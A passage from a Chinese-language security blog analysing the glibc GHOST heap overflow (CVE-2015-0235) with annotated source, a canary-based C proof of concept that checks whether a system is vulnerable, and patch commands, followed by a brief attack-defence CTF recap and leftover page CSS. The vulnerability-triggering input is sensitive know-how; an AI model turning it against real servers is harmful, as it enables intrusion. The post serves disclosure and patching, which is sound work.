93 *h_errnop = TRY_AGAIN;
94 __set_errno (ERANGE);
95 goto done;
96 }
97 }
</code></pre>
<p>non-reentrant</p>
<pre><code class="language-c"> 98 else if (buffer_size != NULL && *buffer_size < size_needed)
99 {
100 char *new_buf;
101 *buffer_size = size_needed;
102 new_buf = (char *) realloc (*buffer, *buffer_size);
103
104 if (new_buf == NULL)
105 {
106 save = errno;
107 free (*buffer);
108 *buffer = NULL;
109 *buffer_size = 0;
110 __set_errno (save);
111 if (h_errnop != NULL)
112 *h_errnop = TRY_AGAIN;
113 *result = NULL;
114 goto done;
115 }
116 *buffer = new_buf;
117 }
</code></pre>
<p>接下來就是<strong>最關鍵</strong>的地方</p>
<pre><code class="language-c">121 host_addr = (host_addr_t *) *buffer;
122 h_addr_ptrs = (host_addr_list_t *)
123 ((char *) host_addr + sizeof (*host_addr));
124 h_alias_ptr = (char **) ((char *) h_addr_ptrs + sizeof (*h_addr_ptrs));
125 hostname = (char *) h_alias_ptr + sizeof (*h_alias_ptr);
</code></pre>
<p>從上面可以看到 <code>buffer</code> 的部分一共有四個不同的 pointer 指向他的的記憶體區塊,分別是 <code>host_addr</code>, <code>h_addr_ptrs</code>, <code>h_alias_ptr</code>, 和 <code>hostname</code>,但回頭看看剛剛 <code>size_needed</code> 那部份的 code 卻沒有計算到 <code>sizeof (*h_alias_ptr)</code> 的部分,因此我們可以 overflow 一個 char pointer 的大小,說到這裡可能又頭昏了,只好用圖來說明:</p>
<ul>
<li><p>下圖是說明 buffer 這個空間是透過 <code>gethostbyname*()</code> 去分配到的 heap 中的記憶體區塊,並且有四個 pointer 分別指到其中的一部分
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBf1PmhhAS5sylEdQZ_Va0GOcy5S0VF34j5xTt7j8KCd7xf8YH1nRbM4KT0egOxW0c5QJnYVB0S_mKddtkfYCvgr4_jurKQJ-9DFeJcWU-cW-Wo-MajnjYXAveiiW2YIdyUNJHNuycbE/s1600/ghost001.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjBf1PmhhAS5sylEdQZ_Va0GOcy5S0VF34j5xTt7j8KCd7xf8YH1nRbM4KT0egOxW0c5QJnYVB0S_mKddtkfYCvgr4_jurKQJ-9DFeJcWU-cW-Wo-MajnjYXAveiiW2YIdyUNJHNuycbE/s320/ghost001.jpg" width="320" height="153" /></a></div>
<li><p>然而 <code>size_needed</code> 卻少計了 <code>sizeof (*h_alias_ptr)</code> ,讓系統以為所分配的大小夠塞全部的東西
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUwiYG2iXsLMjkezWQtfn8hjknIO0tBUFH78P1HUnjq-KvfgOFRoQmGeBZFrHLHLUW8Jzs7c2llEyIoX6Yk2858ZLQ936Gyo3ZcaMvk9xSQUpBuYXzpcmDwDFTA36XP3_K1ynyhi8pgMQ/s1600/ghost.002.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUwiYG2iXsLMjkezWQtfn8hjknIO0tBUFH78P1HUnjq-KvfgOFRoQmGeBZFrHLHLUW8Jzs7c2llEyIoX6Yk2858ZLQ936Gyo3ZcaMvk9xSQUpBuYXzpcmDwDFTA36XP3_K1ynyhi8pgMQ/s320/ghost.002.jpg" width="320" height="154" /></a></div>
</ul>
<p>但接下來這段 code 就是造成 overflow 的地方,主要是將 name 的內容塞到 hostname 所指的記憶體區塊</p>
<pre><code class="language-c">157 resbuf->h_name = strcpy (hostname, name);
</code></pre>
<p>問題來了,假設 <code>size_needed</code> 剛好為預先分配的最大值 1024 ,那麼這時候 hostname 所指的位置應該只剩 <code>sizeof(name)-sizeof(*h_alias_ptrs)</code> 的空間可以放而已,因此當 name 複製到 hostname 時就會造成 overflow,就如下圖所示</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWfMpjPbDwdW8nzz4rRJGtko1p_r-r4zh50WR7vd72vcdC9SGlWpQgk3MssPxWl1YSa7Y2xHonaRv1TtMc-WGjrEiuBOv8ZVC79mfrZhfE8iyGEtXAkMTHqYcAakeFQB1MYoAE9n5D9Rk/s1600/ghost003.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWfMpjPbDwdW8nzz4rRJGtko1p_r-r4zh50WR7vd72vcdC9SGlWpQgk3MssPxWl1YSa7Y2xHonaRv1TtMc-WGjrEiuBOv8ZVC79mfrZhfE8iyGEtXAkMTHqYcAakeFQB1MYoAE9n5D9Rk/s320/ghost003.jpg" width="320" height="158" /></a></div>
<p>這就是這次漏洞的主要問題點,不過要走到這項流程必須符合之前所說的條件才會達成,更詳細的內容請參考 <a href="https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt">Qualys 所釋出的漏洞分析</a>,上面有更詳細的說明及測試。</p>
<h1 id="toc_5">POC</h1>
<p>可測試系統中是否為安全的,使用方式為,請將下列程式碼寫入 <code>ghost.c</code> 檔案中,然後執行</p>
<pre><code>$ gcc ghost.c -o ghost
$ ./ghost
# 如果出現 vulnerable 那麼就代表系統中存在這個風險
</code></pre>
<pre><code class="language-c">#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}
</code></pre>
<h1 id="toc_6">受引響的服務</h1>
<p>Exim、clockdiff、<strong>pppd</strong> 等調用 <code>gethostbyname*()</code> 的服務
新增 <a href="http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html"><strong>wordpress</strong></a> 等 php 相關的 CMS 也有機會受影響</p>
<h1 id="toc_7"><a href="http://seclists.org/oss-sec/2015/q1/283">排除名單</a></h1>
<p>apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
vsftpd, xinetd.
雖然上述是目前應該不會有問題的,但還是建議更新一下 glibc 以防萬一</p>
<h1 id="toc_8">同場加映</h1>
<p>這幾天下來又有研究人員<a href="http://threatpost.com/php-applications-wordpress-subject-to-ghost-glibc-vulnerability/110755">發現</a>以 php 所寫的相關應用也都有機會受到影響,像是 wordpress 等等 <a href="http://zh.wikipedia.org/wiki/%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F">CMS</a> ,攻擊者有機會藉由惡意的 domain 來觸發 ghost 這個漏洞,危害極大,所以老話一句,無論如何都請更新 Glibc ,以確保伺服器的安全。</p>
<h1 id="toc_9">修補方式</h1>
<p>Debian 系列</p>
<pre><code># apt-get clean
# apt-get update
# apt-get upgrade
# reboot
</code></pre>
<p>Red Hat 系列</p>
<pre><code># yum clean
# yum update
# yum install glibc*
# reboot
</code></pre>
<p>其他各版本的修補方式可參考<a href="http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/">這篇</a></p>
<h1 id="toc_10">Reference</h1>
<p><a href="https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt">Qualys Security Advisory CVE-2015-0235</a>
<a href="http://osxr.org/glibc/source/?v=glibc-2.17">glibc Cross Reference</a>
<a href="http://www.freebuf.com/news/57729.html">Freebuf</a>
<a href="http://threatpost.com/php-applications-wordpress-subject-to-ghost-glibc-vulnerability/110755">threatpost</a></p>
<h1 id="toc_11">附註</h1>
<p>如上述內容有任何錯誤的地方歡迎留言告知</p>
</body>
Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-73858077999388759452015-01-20T20:49:00.000-08:002016-10-10T20:49:19.622-07:00CTCTF<style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
</head>
<body>
<h1 id="toc_0">CTCTF</h1>
<p>這場 <a href="http://ct.ctf.tw/">CTF</a> 是交大程式安全及台大電腦安全課程的期末考,不過玩起來就跟真正的比賽一樣完全不像期末考,這次是以旁聽生的身份去參加,也是第一次參加現場攻防類型的 CTF ,不過因為經驗不足的關係,完全只能墊底,不過也當作一次經驗,這次實在過於注重在解題部分,並沒有考慮到要先把洞補起來,以及封包的重送等等,導致失去得分的機會,這類比賽跟以往的 Jeopardy 更有挑戰性,也相當有趣,只可惜這類比賽不多也不常見,希望哪天有機會可以多出去玩玩看,也希望能在這段時間能多多訓練自己,這條路實在是太廣了。</p>
<p>在這做個小筆記好了,未來有機會在玩這類型的比賽時,可以更快地上手</p>
<ul>
<li>賽前準備
<ul>
<li>寫好可以直接送封包 data 的 script</li>
<li>寫好可以直接送 key 的 script</li>
<li>寫好 exploit 大致上的雛形</li>
<li>寫好 wrapper ....... </li>
<li>安裝好各項工具</li>
<li>gdb , wireshark , tcpdump , IDA ......</li>
</ul></li>
<li>賽中
<ul>
<li>先把已知道洞補起來!!!</li>
<li>盡量在其他組別解出來前先解出來,雖然很不容易 XD</li>
<li>要有人做封包分析及備份</li>
<li>一旦有人攻擊成功,立即找出攻擊的封包,並利用它來送給其他組,以防與他組分數落差太大</li>
<li>分析完立刻補起漏洞</li>
</ul></li>
<li>結束後
<ul>
<li>分析嚴重失分原因</li>
<li>分析分工是否妥當</li>
<li>下次該如何應對</li>
</ul></li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-43963289832712741412014-12-13T11:09:00.000-08:002016-10-10T11:16:47.449-07:00 CTF 筆記<style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
